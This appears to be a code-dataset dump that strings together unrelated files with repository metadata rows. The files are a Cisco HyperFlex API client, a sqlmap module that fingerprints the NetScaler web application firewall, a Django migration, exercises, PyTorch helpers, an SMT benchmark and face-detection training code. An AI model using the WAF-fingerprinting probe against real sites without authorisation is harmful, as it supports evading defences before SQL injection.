to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.hyperflex_sys_config_policies_moid_patch_with_http_info(moid, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str moid: The moid of the hyperflexSysConfigPolicy instance. (required)
:param HyperflexSysConfigPolicy body: hyperflexSysConfigPolicy to update (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['moid', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method hyperflex_sys_config_policies_moid_patch" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'moid' is set
if ('moid' not in params) or (params['moid'] is None):
raise ValueError("Missing the required parameter `moid` when calling `hyperflex_sys_config_policies_moid_patch`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `hyperflex_sys_config_policies_moid_patch`")
collection_formats = {}
path_params = {}
if 'moid' in params:
path_params['moid'] = params['moid']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api('/hyperflex/SysConfigPolicies/{moid}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def hyperflex_sys_config_policies_moid_post(self, moid, body, **kwargs):
"""
Update an instance of hyperflexSysConfigPolicy
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.hyperflex_sys_config_policies_moid_post(moid, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str moid: The moid of the hyperflexSysConfigPolicy instance. (required)
:param HyperflexSysConfigPolicy body: hyperflexSysConfigPolicy to update (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.hyperflex_sys_config_policies_moid_post_with_http_info(moid, body, **kwargs)
else:
(data) = self.hyperflex_sys_config_policies_moid_post_with_http_info(moid, body, **kwargs)
return data
def hyperflex_sys_config_policies_moid_post_with_http_info(self, moid, body, **kwargs):
"""
Update an instance of hyperflexSysConfigPolicy
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.hyperflex_sys_config_policies_moid_post_with_http_info(moid, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str moid: The moid of the hyperflexSysConfigPolicy instance. (required)
:param HyperflexSysConfigPolicy body: hyperflexSysConfigPolicy to update (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['moid', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method hyperflex_sys_config_policies_moid_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'moid' is set
if ('moid' not in params) or (params['moid'] is None):
raise ValueError("Missing the required parameter `moid` when calling `hyperflex_sys_config_policies_moid_post`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `hyperflex_sys_config_policies_moid_post`")
collection_formats = {}
path_params = {}
if 'moid' in params:
path_params['moid'] = params['moid']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api('/hyperflex/SysConfigPolicies/{moid}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def hyperflex_sys_config_policies_post(self, body, **kwargs):
"""
Create a hyperflexSysConfigPolicy
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.hyperflex_sys_config_policies_post(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param HyperflexSysConfigPolicy body: hyperflexSysConfigPolicy to add (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.hyperflex_sys_config_policies_post_with_http_info(body, **kwargs)
else:
(data) = self.hyperflex_sys_config_policies_post_with_http_info(body, **kwargs)
return data
def hyperflex_sys_config_policies_post_with_http_info(self, body, **kwargs):
"""
Create a hyperflexSysConfigPolicy
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.hyperflex_sys_config_policies_post_with_http_info(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param HyperflexSysConfigPolicy body: hyperflexSysConfigPolicy to add (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method hyperflex_sys_config_policies_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `hyperflex_sys_config_policies_post`")
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api('/hyperflex/SysConfigPolicies', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| [
"“[email protected]”"
] | |
5afe09e31c7ddd461bd0ca9ead432738d103c647 | 148072ce210ca4754ea4a37d83057e2cf2fdc5a1 | /src/core/w3af/w3af/plugins/attack/db/sqlmap/waf/netscaler.py | 04b6d4eca5614726a9e6be0a151109dfc48cf07b | [] | no_license | ycc1746582381/webfuzzer | 8d42fceb55c8682d6c18416b8e7b23f5e430c45f | 0d9aa35c3218dc58f81c429cae0196e4c8b7d51b | refs/heads/master | 2021-06-14T18:46:59.470232 | 2017-03-14T08:49:27 | 2017-03-14T08:49:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 812 | py | #!/usr/bin/env python
"""
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import re
from lib.core.enums import HTTP_HEADER
from lib.core.settings import WAF_ATTACK_VECTORS
__product__ = "NetScaler (Citrix Systems)"
def detect(get_page):
retval = False
for vector in WAF_ATTACK_VECTORS:
page, headers, code = get_page(get=vector)
retval = re.search(r"\Aclose", headers.get("Cneonction", "") or headers.get("nnCoection", ""), re.I) is not None
retval = re.search(r"\A(ns_af=|citrix_ns_id|NSC_)", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
retval |= re.search(r"\ANS-CACHE", headers.get(HTTP_HEADER.VIA, ""), re.I) is not None
if retval:
break
return retval
| [
"[email protected]"
] | |
c62bf5e407c19bc1d3059d7e8ee9abbaba6d7100 | eb74806869a4340a6d8a2623bbe72bd4e64dcde8 | /apps/rss_feeds/migrations/0006_feed_fs_size_bytes.py | cebc86363ae3a0e11564538d0d6f2f78ab934930 | [
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | sictiru/NewsBlur | a0874a1044926d2268ba07a928e62fce5c9a8310 | 1ab88e4cc34775d00a1ac90ee08bc2498577e773 | refs/heads/sictiru | 2023-08-19T20:24:20.638019 | 2023-08-15T03:52:09 | 2023-08-15T03:52:09 | 250,445,213 | 1 | 0 | MIT | 2023-03-06T15:34:38 | 2020-03-27T05:05:44 | Objective-C | UTF-8 | Python | false | false | 409 | py | # Generated by Django 3.1.10 on 2022-05-11 17:10
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('rss_feeds', '0005_feed_archive_subscribers'),
]
operations = [
migrations.AddField(
model_name='feed',
name='fs_size_bytes',
field=models.IntegerField(blank=True, null=True),
),
]
| [
"[email protected]"
] | |
3b30a770bc9971f15e4f4a4cd43afbcdce5c6da2 | cc9cf69b1534dc0d9530b4ff485084162a404e34 | /leetcode/pass/leetcode_90.py | 74fc6a05142615a6ecb6b64f80b6893234b2b510 | [] | no_license | NASA2333/study | 99a58b2c9979201e9a4fae0c797391a538de6f45 | ba63bc18f3c788090e43406315497329b00ec0a5 | refs/heads/master | 2021-05-03T22:26:52.541760 | 2018-02-07T02:24:55 | 2018-02-07T02:24:55 | 104,988,265 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 615 | py | '''
Given a collection of integers that might contain duplicates, nums, return all possible subsets (the power set).
Note: The solution set must not contain duplicate subsets.
For example,
If nums = [1,2,2], a solution is:
[
[2],
[1],
[1,2,2],
[2,2],
[1,2],
[]
]
'''
from itertools import permutations
l =[]
def subsetsWithDup(s):
for i in range(len(s)+1):
l.append(list(permutations(s,i)))
for i in l[1:]:
l[0].extend(i)
l2 = [sorted(list(i)) for i in l[0]]
for i in range(len(l2)):
if l2[i] in l2[i+1:]:
l2[i] ="*"
return [i for i in l2 if i !='*']
print(subsetsWithDup([1,2,2])) | [
"[email protected]"
] | |
8261febe86d08207fffb746dc4ea9b8bb4edf2f7 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/128/usersdata/195/33234/submittedfiles/al6.py | a43d19a9835509d9bcff514428b8a373c0912704 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 211 | py | # -*- coding: utf-8 -*-
n=int(input('digite n:'))
contador=0
i=2
while i<=n:
if n%i==0:
contador=contador+1
print(i)
i=i+1
if contador==0:
print('PRIMO')
else:
print('NÃO PRIMO') | [
"[email protected]"
] | |
a07fae45caf888b5a1f8594235788961f53f595f | 17f527d6936397270183a35d7097e0a99de16cb5 | /AtCoder/ABC/yomikomi.py | d7eac4e0bf82827b1dc0460a58ae586376914767 | [] | no_license | ryosuke071111/algorithms | e942f043d08c7c7e2c926ed332ee2b8c44bdf0c5 | 867764450cc0f2a709fa2f743d9a0d95001e9296 | refs/heads/master | 2020-05-14T17:14:39.314064 | 2019-04-17T12:58:12 | 2019-04-17T12:58:12 | 181,888,623 | 11 | 0 | null | null | null | null | UTF-8 | Python | false | false | 108 | py | with open('goi.txt') as f:
a=f.readlines()
count=0
for i in a:
if "・" in i:
count+=1
print(count)
| [
"[email protected]"
] | |
a7331b3ee43605f606716e225b6f3a8427eb2df6 | 4ae7cdc9292009398a292bdf6bee61428559fdfd | /SourceCodeTools/mltools/torch/__init__.py | 3cf41a14372e44768224cab38988ebb371ea39dc | [] | no_license | VitalyRomanov/method-embedding | 52a4e6e7bf726b4db0872902a0eaf1d8cb82b4a8 | 1c8f0fc04eb1f495555272d9747fd2fea68525e1 | refs/heads/master | 2023-08-31T17:39:04.051912 | 2023-01-08T05:02:52 | 2023-01-08T05:02:52 | 219,153,628 | 5 | 7 | null | 2023-07-22T20:27:20 | 2019-11-02T12:54:12 | Python | UTF-8 | Python | false | false | 308 | py | import torch
def compute_accuracy(pred_, true_):
return torch.sum(pred_ == true_).item() / len(true_)
def to_numpy(tensor):
return tensor.cpu().detach().numpy()
def get_length_mask(target, lens):
mask = torch.arange(target.size(1)).to(target.device)[None, :] < lens[:, None]
return mask | [
"[email protected]"
] | |
759b4b822b6a931f35052cc8ae753ec5e73d26ef | fab14fae2b494068aa793901d76464afb965df7e | /benchmarks/f3_wrong_hints/scaling_nonlinear_software/3-19_35.py | 57bc6dce8fac1bc637a307a76bce16e0d73a5015 | [
"MIT"
] | permissive | teodorov/F3 | 673f6f9ccc25acdfdecbfc180f439253474ba250 | c863215c318d7d5f258eb9be38c6962cf6863b52 | refs/heads/master | 2023-08-04T17:37:38.771863 | 2021-09-16T07:38:28 | 2021-09-16T07:38:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,903 | py | from typing import FrozenSet, Tuple
import pysmt.typing as types
from pysmt.environment import Environment as PysmtEnv
from pysmt.fnode import FNode
from utils import symb_to_next
from hint import Hint, Location
def transition_system(env: PysmtEnv) -> Tuple[FrozenSet[FNode], FNode, FNode,
FNode]:
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
pc = mgr.Symbol("pc", types.INT)
x = mgr.Symbol("x", types.INT)
y = mgr.Symbol("y", types.INT)
z = mgr.Symbol("z", types.INT)
x_pc = symb_to_next(mgr, pc)
x_x = symb_to_next(mgr, x)
x_y = symb_to_next(mgr, y)
x_z = symb_to_next(mgr, z)
symbols = frozenset([pc, x, y, z])
n_locs = 5
int_bound = n_locs
pcs = []
x_pcs = []
ints = [mgr.Int(i) for i in range(int_bound)]
for l in range(n_locs):
n = ints[l]
pcs.append(mgr.Equals(pc, n))
x_pcs.append(mgr.Equals(x_pc, n))
m_1 = mgr.Int(-1)
pcend = mgr.Equals(pc, m_1)
x_pcend = mgr.Equals(x_pc, m_1)
# initial location.
init = pcs[0]
# control flow graph.
cfg = mgr.And(
# pc = -1 : -1,
mgr.Implies(pcend, x_pcend),
# pc = 0 & !(y >= 1) : -1,
mgr.Implies(mgr.And(pcs[0], mgr.Not(mgr.GE(y, ints[1]))), x_pcend),
# pc = 0 & y >= 1 : 1,
mgr.Implies(mgr.And(pcs[0], mgr.GE(y, ints[1])), x_pcs[1]),
# pc = 1 & !(z >= 1) : -1,
mgr.Implies(mgr.And(pcs[1], mgr.Not(mgr.GE(z, ints[1]))), x_pcend),
# pc = 1 & z >= 1 : 2,
mgr.Implies(mgr.And(pcs[1], mgr.GE(z, ints[1])), x_pcs[2]),
# pc = 2 & !(x >= 0) : -1,
mgr.Implies(mgr.And(pcs[2], mgr.Not(mgr.GE(x, ints[0]))), x_pcend),
# pc = 2 & x >= 0 : 3,
mgr.Implies(mgr.And(pcs[2], mgr.GE(x, ints[0])), x_pcs[3]),
# pc = 3 : 4,
mgr.Implies(pcs[3], x_pcs[4]),
# pc = 4 : 2,
mgr.Implies(pcs[4], x_pcs[2]))
# transition labels.
labels = mgr.And(
# (pc = -1 & pc' = -1) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcend, x_pcend),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 0 & pc' = -1) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[0], x_pcend),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 0 & pc' = 1) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[0], x_pcs[1]),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 1 & pc' = -1) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[1], x_pcend),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 1 & pc' = 2) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[1], x_pcs[2]),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 2 & pc' = -1) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[2], x_pcend),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 2 & pc' = 3) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[2], x_pcs[3]),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 3 & pc' = 4) -> (x' = y*z - 1 & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[3], x_pcs[4]),
mgr.And(mgr.Equals(x_x, mgr.Minus(mgr.Times(y, z), ints[1])),
mgr.Equals(x_y, y), mgr.Equals(x_z, z))),
# (pc = 4 & pc' = 2) -> (x' = x & y' = y+1 & z' = z),
mgr.Implies(
mgr.And(pcs[4], x_pcs[2]),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, mgr.Plus(y, ints[1])),
mgr.Equals(x_z, z))))
# transition relation.
trans = mgr.And(cfg, labels)
# fairness.
fairness = mgr.Not(pcend)
return symbols, init, trans, fairness
def hints(env: PysmtEnv) -> FrozenSet[Hint]:
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
pc = mgr.Symbol("pc", types.INT)
x = mgr.Symbol("x", types.INT)
y = mgr.Symbol("y", types.INT)
z = mgr.Symbol("z", types.INT)
symbs = frozenset([pc, x, y, z])
x_pc = symb_to_next(mgr, pc)
x_x = symb_to_next(mgr, x)
x_y = symb_to_next(mgr, y)
x_z = symb_to_next(mgr, z)
res = []
i_0 = mgr.Int(0)
i_1 = mgr.Int(1)
i_2 = mgr.Int(2)
i_3 = mgr.Int(3)
loc0 = Location(env, mgr.GT(x, i_3), mgr.And(mgr.GT(y, i_1), mgr.GT(z, i_1)))
loc0.set_progress(1, mgr.GE(x_x, mgr.Minus(mgr.Times(y, z), i_1)))
loc1 = Location(env, mgr.GT(x, i_0), mgr.GE(y, i_1))
loc1.set_progress(2, mgr.Equals(x_x, mgr.Plus(x, y)))
loc2 = Location(env, mgr.GT(x, i_3))
loc2.set_progress(2, mgr.Equals(x_x, x))
h_x = Hint("h_x4", env, frozenset([x]), symbs)
h_x.set_locs([loc0, loc1, loc2])
res.append(h_x)
loc0 = Location(env, mgr.GE(z, i_0))
loc0.set_progress(1, mgr.Equals(x_z, z))
loc1 = Location(env, mgr.GE(z, i_0))
loc1.set_progress(0, mgr.Equals(x_z, mgr.Plus(z, i_3)))
h_z = Hint("h_z4", env, frozenset([z]), symbs)
h_z.set_locs([loc0, loc1])
res.append(h_z)
loc0 = Location(env, mgr.Equals(pc, i_2))
loc0.set_progress(1, mgr.GT(x_pc, i_2))
loc1 = Location(env, mgr.GE(pc, i_3))
loc1.set_progress(2, mgr.GE(x_pc, i_3))
loc2 = Location(env, mgr.GE(pc, i_3))
loc2.set_progress(0, mgr.Equals(x_pc, i_2))
h_pc = Hint("h_pc4", env, frozenset([pc]), symbs)
h_pc.set_locs([loc0, loc1, loc2])
res.append(h_pc)
return frozenset(res)
| [
"[email protected]"
] | |
0c430c6aecd9750cc42ba607375c8993c00e350c | 0b420532815a3841b74335e1e6ab9f3d533225c3 | /day_night.py | a9501b87541c63bc5ae6e47f5b599ce2137cbdd2 | [] | no_license | akuhnregnier/npower | 3d7ec12e2e21a6e23db96714391986d372e0e6e0 | bf3d842cde9b2e311cd415a8da7786ed36909645 | refs/heads/master | 2021-06-11T21:23:55.221317 | 2016-11-17T16:32:06 | 2016-11-17T16:32:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,808 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Nov 03 17:08:37 2016
@author: ahk114
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
#import seaborn as sns
import cPickle as pickle
import os
from numpy.fft import fft
from numpy.fft import fftfreq
import scipy.optimize as opt
import copy
plt.close('all')
pd.options.display.expand_frame_repr = False
pd.options.display.max_columns = 15
source = 'round_1.xlsx'
picklefile = 'round1.pickle'
if not os.path.isfile(picklefile):
df = pd.read_excel(source)
with open(picklefile,'wb') as f:
pickle.dump(df,f,protocol=2)
else:
with open(picklefile,'rb') as f:
df = pickle.load(f)
print "Rows, columns:", df.shape
temps = df['Temperature']
days = []
nights = []
for i,temp in enumerate(temps):
print "i",i
if i%48<12 or i%48>=36:
nights.append(temp)
else:
days.append(temp)
day_avg = []
night_avg = []
for i in range(0,len(days),24):
print "i2"
day_avg.append(np.mean(days[i:i+24]))
for i in range(0,len(nights),24):
print "i3",i
night_avg.append(np.mean(nights[i:i+24]))
dnight = []
dday = []
for i,demand in enumerate(df['Demand'].loc[df['Demand'] != '?? FC1 ??']):
print "i",i
if i%48<12 or i%48>=36:
dnight.append(demand)
else:
dday.append(demand)
demand_day_avg = []
demand_night_avg = []
for i in range(0,len(dday),24):
print "i2"
demand_day_avg.append(np.mean(dday[i:i+24]))
for i in range(0,len(dnight),24):
print "i3",i
demand_night_avg.append(np.mean(dnight[i:i+24]))
plt.figure()
plt.scatter(day_avg[:len(demand_day_avg)],demand_day_avg,c='g',label='day')
plt.scatter(night_avg[:len(demand_night_avg)],demand_night_avg,c='b',label='night')
plt.legend()
plt.xlabel('temperature')
plt.ylabel('demand')
| [
"[email protected]"
] | |
fa9bb76e3d49340273e92d5342b1d42d76847abc | be0171a5e8d2d81c4b6872d180a7e376ca7ac6f7 | /src/prepare_data/get_faces.py | e0e63248aab01ec17afb9f50b0bd9adff5a162cf | [] | no_license | fitrialif/emotion-and-gender-classification | 09ba7b6bf1d81950970eaad3442485cd051fc661 | 0415b18313c079d9d6769d03179c6b47ac8e495a | refs/heads/master | 2020-03-23T09:02:12.525932 | 2018-05-28T13:33:20 | 2018-05-28T13:33:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 53,008 | py | import tensorflow as tf
import numpy as np
import os
#from print_ckpt import print_ckpt
from tensorflow.contrib import slim
import sys
from easydict import EasyDict as edict
import argparse
import cv2
import time
config = edict()
config.BATCH_SIZE = 256
config.CLS_OHEM = True
config.CLS_OHEM_RATIO = 0.7
config.BBOX_OHEM = False
config.BBOX_OHEM_RATIO = 0.7
config.EPS = 1e-14
config.LR_EPOCH = [640,1280,25600,51200]
# 5:test relu, 100: generate for MVtensor
config.train_face = 1
config.r_out = 0
config.P_Num = 3000
config.rnet_wide =0
config.o_out =0
config.Debug =0
def py_nms(dets, thresh, mode="Union"):
"""
greedily select boxes with high confidence
keep boxes overlap <= thresh
rule out overlap > thresh
:param dets: [[x1, y1, x2, y2 score]]
:param thresh: retain overlap <= thresh
:return: indexes to keep
"""
x1 = dets[:, 0]
y1 = dets[:, 1]
x2 = dets[:, 2]
y2 = dets[:, 3]
scores = dets[:, 4]
areas = (x2 - x1 + 1) * (y2 - y1 + 1)
order = scores.argsort()[::-1]
#order = scores.argsort()
#print("order, ",order)
keep = []
while order.size > 0:
i = order[0]
#print("i",i)
keep.append(i)
xx1 = np.maximum(x1[i], x1[order[1:]])
yy1 = np.maximum(y1[i], y1[order[1:]])
xx2 = np.minimum(x2[i], x2[order[1:]])
yy2 = np.minimum(y2[i], y2[order[1:]])
w = np.maximum(0.0, xx2 - xx1 + 1)
h = np.maximum(0.0, yy2 - yy1 + 1)
inter = w * h
if mode == "Union":
ovr = inter / (areas[i] + areas[order[1:]] - inter)
elif mode == "Minimum":
ovr = inter / np.minimum(areas[i], areas[order[1:]])
#keep
#print("len over ",len(ovr))
#get the opsite of the condition
inds = np.where(ovr <= thresh)[0]
#print("inds ",inds+1)
# inds inlcude the first one : 0, inds+1 is keeping the <thresh;
# because areas[order[1:]], so the lenth of order[1:] is less one than orignal order. so inds should plus 1
order = order[inds+1]
return keep
num_keep_radio = 0.7
#define prelu
test_fg = config.train_face
def prelu(inputs):
#alphas = tf.get_variable("alphas", shape=inputs.get_shape()[-1], dtype=tf.float32, initializer=tf.constant_initializer(0.25))
alphas = 0.25
pos = tf.nn.relu(inputs)
if test_fg == 100 or test_fg==5:
return pos
else:
#neg = alphas * (inputs-abs(inputs))*0.5
neg = 0.25 * (inputs-abs(inputs))*0.5
return pos +neg
def dense_to_one_hot(labels_dense,num_classes):
num_labels = labels_dense.shape[0]
index_offset = np.arange(num_labels)*num_classes
#num_sample*num_classes
labels_one_hot = np.zeros((num_labels,num_classes))
labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1
return labels_one_hot
#cls_prob:batch*2
#label:batch
def cls_ohem(cls_prob, label):
zeros = tf.zeros_like(label)
#label=-1 --> label=0 net_factory
label_filter_invalid = tf.where(tf.less(label,0), zeros, label)
num_cls_prob = tf.size(cls_prob)
cls_prob_reshape = tf.reshape(cls_prob,[num_cls_prob,-1])
label_int = tf.cast(label_filter_invalid,tf.int32)
num_row = tf.to_int32(cls_prob.get_shape()[0])
row = tf.range(num_row)*2
indices_ = row + label_int
label_prob = tf.squeeze(tf.gather(cls_prob_reshape, indices_))
loss = -tf.log(label_prob+1e-10)
zeros = tf.zeros_like(label_prob, dtype=tf.float32)
ones = tf.ones_like(label_prob,dtype=tf.float32)
valid_inds = tf.where(label < zeros,zeros,ones)
num_valid = tf.reduce_sum(valid_inds)
keep_num = tf.cast(num_valid*num_keep_radio,dtype=tf.int32)
#set 0 to invalid sample
loss = loss * valid_inds
loss,_ = tf.nn.top_k(loss, k=keep_num)
return tf.reduce_mean(loss)
def bbox_ohem_smooth_L1_loss(bbox_pred,bbox_target,label):
sigma = tf.constant(1.0)
threshold = 1.0/(sigma**2)
zeros_index = tf.zeros_like(label, dtype=tf.float32)
valid_inds = tf.where(label!=zeros_index,tf.ones_like(label,dtype=tf.float32),zeros_index)
abs_error = tf.abs(bbox_pred-bbox_target)
loss_smaller = 0.5*((abs_error*sigma)**2)
loss_larger = abs_error-0.5/(sigma**2)
smooth_loss = tf.reduce_sum(tf.where(abs_error<threshold,loss_smaller,loss_larger),axis=1)
keep_num = tf.cast(tf.reduce_sum(valid_inds)*num_keep_radio,dtype=tf.int32)
smooth_loss = smooth_loss*valid_inds
_, k_index = tf.nn.top_k(smooth_loss, k=keep_num)
smooth_loss_picked = tf.gather(smooth_loss, k_index)
return tf.reduce_mean(smooth_loss_picked)
#label=1 or label=-1 then do regression
def bbox_ohem(bbox_pred,bbox_target,label):
zeros_index = tf.zeros_like(label, dtype=tf.float32)
ones_index = tf.ones_like(label,dtype=tf.float32)
valid_inds = tf.where(tf.equal(tf.abs(label), 1),ones_index,zeros_index)
#(batch,)
square_error = tf.square(bbox_pred-bbox_target)
square_error = tf.reduce_sum(square_error,axis=1)
#keep_num scalar
num_valid = tf.reduce_sum(valid_inds)
#keep_num = tf.cast(num_valid*num_keep_radio,dtype=tf.int32)
keep_num = tf.cast(num_valid, dtype=tf.int32)
#keep valid index square_error
square_error = square_error*valid_inds
_, k_index = tf.nn.top_k(square_error, k=keep_num)
square_error = tf.gather(square_error, k_index)
return tf.reduce_mean(square_error)
def landmark_ohem(landmark_pred,landmark_target,label):
#keep label =-2 then do landmark detection
ones = tf.ones_like(label,dtype=tf.float32)
zeros = tf.zeros_like(label,dtype=tf.float32)
valid_inds = tf.where(tf.equal(label,-2),ones,zeros)
square_error = tf.square(landmark_pred-landmark_target)
square_error = tf.reduce_sum(square_error,axis=1)
num_valid = tf.reduce_sum(valid_inds)
#keep_num = tf.cast(num_valid*num_keep_radio,dtype=tf.int32)
keep_num = tf.cast(num_valid, dtype=tf.int32)
square_error = square_error*valid_inds
_, k_index = tf.nn.top_k(square_error, k=keep_num)
square_error = tf.gather(square_error, k_index)
return tf.reduce_mean(square_error)
def cal_accuracy(cls_prob,label):
pred = tf.argmax(cls_prob,axis=1)
label_int = tf.cast(label,tf.int64)
cond = tf.where(tf.greater_equal(label_int,0))
picked = tf.squeeze(cond)
label_picked = tf.gather(label_int,picked)
pred_picked = tf.gather(pred,picked)
accuracy_op = tf.reduce_mean(tf.cast(tf.equal(label_picked,pred_picked),tf.float32))
return accuracy_op
#construct Pnet
#label:batch
def print_shape(net,name,conv_num):
print("the net {} in {} shape is {} ".format(name,net,[conv_num.get_shape()]))
def P_Net(inputs,label=None,bbox_target=None,landmark_target=None,training=True):
#define common param
with slim.arg_scope([slim.conv2d],
activation_fn=prelu,
weights_initializer=slim.xavier_initializer(),
biases_initializer=tf.zeros_initializer(),
weights_regularizer=slim.l2_regularizer(0.0005),
padding='valid'):
#print ("Pnet input shape",inputs.get_shape())
#net = slim.conv2d(inputs, 10, 3, stride=1,scope='conv1')
net = slim.conv2d(inputs, 8, 3, stride=1,scope='conv1')
#print ("conv1 shape ",net.get_shape())
net = slim.max_pool2d(net, kernel_size=[2,2], stride=2, scope='pool1', padding='SAME')
